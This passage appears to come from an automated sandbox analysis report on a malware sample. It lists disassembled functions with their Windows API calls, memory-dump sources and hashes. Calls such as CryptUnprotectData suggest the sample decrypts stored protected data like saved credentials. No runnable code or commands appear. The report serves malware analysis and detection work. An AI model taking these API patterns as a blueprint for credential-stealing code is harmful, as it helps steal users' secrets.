                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: d7b65a546378e26a3dfa37bc385b536c3c570853736346738a176e62781cbd78
                              • Instruction ID: 989c557be274e30ac2bd16195bc1e7af170ffeaa5068a8ec830507a6297e896b
                              • Opcode Fuzzy Hash: d7b65a546378e26a3dfa37bc385b536c3c570853736346738a176e62781cbd78
                              • Instruction Fuzzy Hash: 4911A2B4240208BFEB14CF65DC95FAA77B5FB89700F208098FA159B390C7B6A945CB90
                              Function 00BF7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C00E00,00000000,?), ref: 00BF79B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BF79B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00C00E00,00000000,?), ref: 00BF79C4
                              • wsprintfA.USER32 ref: 00BF79F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 4378355f7d3e3d925bbc8f06752b3ee17de16b20372c23707bea34214ee14aa3
                              • Instruction ID: 3dfb66e624fb23f63ca9ba9f91168ec7f524d74efa5c77ea0bdcb67a524a7650
                              • Opcode Fuzzy Hash: 4378355f7d3e3d925bbc8f06752b3ee17de16b20372c23707bea34214ee14aa3
                              • Instruction Fuzzy Hash: D3115AB2904118ABCB18DFCADD44BBEB7F8FB4CB11F04415AF601A2280E3785905CBB1
                              Function 00BF7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,009BE958,00000000,?,00C00E10,00000000,?,00000000,00000000), ref: 00BF7A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BF7A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,009BE958,00000000,?,00C00E10,00000000,?,00000000,00000000,?), ref: 00BF7A7D
                              • wsprintfA.USER32 ref: 00BF7AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: c66cb8990f81e9b83b18de32e0db407e19638ad7d22a593fd06bc5a7753ef685
                              • Instruction ID: 5b9df395f362de523ca35460c00fce771d7badd61c446b9fbd81b316e4305c5d
                              • Opcode Fuzzy Hash: c66cb8990f81e9b83b18de32e0db407e19638ad7d22a593fd06bc5a7753ef685
                              • Instruction Fuzzy Hash: F71182B1A45218DFDB248F55DC49F69B7B8F704711F1043E6E606A32C0D7741A45CF51
                              Function 00BF3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                              Download Yara Rule
                              APIs
                              • CoCreateInstance.COMBASE(00BFE118,00000000,00000001,00BFE108,00000000), ref: 00BF3758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00BF37B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 01f7e185eff0629e22e6c7ad98710684aea245d0be3d3b08f8ec0a4d575c8ff6
                              • Instruction ID: e4cb25b5ba580074fcb567874a94cb80797386d645f41a3ff0a6d8ec69ce16c1
                              • Opcode Fuzzy Hash: 01f7e185eff0629e22e6c7ad98710684aea245d0be3d3b08f8ec0a4d575c8ff6
                              • Instruction Fuzzy Hash: FB41EA70A40A1C9FDB24DB58CC95BABB7B5BB48702F4041D8E618E72D0D771AE85CF50
                              Function 00BE9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BE9B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00BE9BA3
                              • LocalFree.KERNEL32(?), ref: 00BE9BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: f5030696b3cb2894c0bda8fea6914716f2b6686ed27c31f6020fec9a8f8a7d81
                              • Instruction ID: cc046648fa15534a1be66d75872e275d2b38c51f3cdec9c069b37387bfcfb009
                              • Opcode Fuzzy Hash: f5030696b3cb2894c0bda8fea6914716f2b6686ed27c31f6020fec9a8f8a7d81
                              • Instruction Fuzzy Hash: F3110CB4A00209DFCB04DFA5D985AAE77F5FF88300F1045A8E915A7350D774AE55CF61
                              Function 00FB3240 Relevance: 4.2, Strings: 2, Instructions: 1665COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: -@mb$5=s
                              • API String ID: 0-1767529023
                              • Opcode ID: 40f3899e906cfa888120052236e9e72ee0b690b8f3c558dd72f9ab9374a7d8ab
                              • Instruction ID: 8b0501a665d8f5981ff901adc631358d0097d4a2ae907b76243c36c0cc03bd7e
                              • Opcode Fuzzy Hash: 40f3899e906cfa888120052236e9e72ee0b690b8f3c558dd72f9ab9374a7d8ab
                              • Instruction Fuzzy Hash: 1EB219F3A082149FE3046E2DEC8567AFBE5EF94720F1A4A3DEAC4C7744E63558018796
                              Function 00ECA54B Relevance: 4.0, Strings: 3, Instructions: 200COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !;5z$4`:k$?,d7
                              • API String ID: 0-1857403863
                              • Opcode ID: b93410287c4bf30215a20dfdfd7e9270acc6593baf296fb1ce3720a1e47e1055
                              • Instruction ID: 5df12e503f1c5d335e7e86cc85a2d14fc9f80981dba052e416cea594dc9fb804
                              • Opcode Fuzzy Hash: b93410287c4bf30215a20dfdfd7e9270acc6593baf296fb1ce3720a1e47e1055
                              • Instruction Fuzzy Hash: 8C5126F3A082109FE7086E3CEC9977ABBD9EB54310F16493DEAC5C7784E97958048786
                              Function 00FAE2A4 Relevance: 2.9, Strings: 1, Instructions: 1671COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: WT=t
                              • API String ID: 0-564892656
                              • Opcode ID: 82017a00d0c6c03e14b33780cf7103c113c6a808839a012a9604e1171aa607cf
                              • Instruction ID: 42a649aa419c63af79582a045d774df57e0ea5c014562ac5089d8a40f6d6b8c1
                              • Opcode Fuzzy Hash: 82017a00d0c6c03e14b33780cf7103c113c6a808839a012a9604e1171aa607cf
                              • Instruction Fuzzy Hash: E8B22AF3A0C2049FE304AE2DEC4567ABBE9EFD4720F1A853DEAC5C3744E63558058696
                              Function 00FB17A9 Relevance: 2.8, Strings: 1, Instructions: 1585COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Qn6:
                              • API String ID: 0-1605114166
                              • Opcode ID: d57371d5b2019501f2f94a5f623cd91be9abecafc793992b78b676dd6c78e357
                              • Instruction ID: be27e695e982d8a47ebb94bb3d753e1470fc95d43c15bba6ffdaeb21ebc3fa24
                              • Opcode Fuzzy Hash: d57371d5b2019501f2f94a5f623cd91be9abecafc793992b78b676dd6c78e357
                              • Instruction Fuzzy Hash: 3FB2C3F360C704AFE3047E29EC8567AFBE9EF94720F16493DE6C483744EA3599008696
                              Function 00E4F953 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 9I$C&?k
                              • API String ID: 0-2035176125
                              • Opcode ID: 0c9293cb53303aa64eb9327f34a35b23cfe727752533ae430d441cd9d4ad9e47
                              • Instruction ID: 9dc9202c2660c12905c4e55c5f794c007024d144a9f01f998696c9c605ce5bb8
                              • Opcode Fuzzy Hash: 0c9293cb53303aa64eb9327f34a35b23cfe727752533ae430d441cd9d4ad9e47
                              • Instruction Fuzzy Hash: 185115B3B152148BE3409E29DC84766B797EBC4310F2B813DCAC897784D93E5D0A8796
                              Function 00EE5160 Relevance: 1.4, Strings: 1, Instructions: 193COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: /O_
                              • API String ID: 0-2000334091
                              • Opcode ID: b6fd63dcd4a30ed710438a32e98be47d9f53782bbb407e4880b664a75bb80ce0
                              • Instruction ID: 593d07faac4feccb7415de698b719b2f2f97e5e1263bac054a935e04763d9184
                              • Opcode Fuzzy Hash: b6fd63dcd4a30ed710438a32e98be47d9f53782bbb407e4880b664a75bb80ce0
                              • Instruction Fuzzy Hash: 0F5129F3F185145BF3046D2DDC5976BBADADBD4320F2A863DDA98C7784E9398C024286
                              Function 00EE844F Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: /#~?
                              • API String ID: 0-3838108040
                              • Opcode ID: 85dba1af474f6a14505d656560a7393c76e89809ca9cee900bd74a7905420862
                              • Instruction ID: 1673735ad4d3758b8f37e73ee257e1884c1d75a190e718fdf8f9ce736eb75d94
                              • Opcode Fuzzy Hash: 85dba1af474f6a14505d656560a7393c76e89809ca9cee900bd74a7905420862
                              • Instruction Fuzzy Hash: ED514BF3E083145BE3046E2DDC5577AB7D9EB94760F6B863DEAD483780E93598008692
                              Function 00F330B5 Relevance: 1.4, Strings: 1, Instructions: 162COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
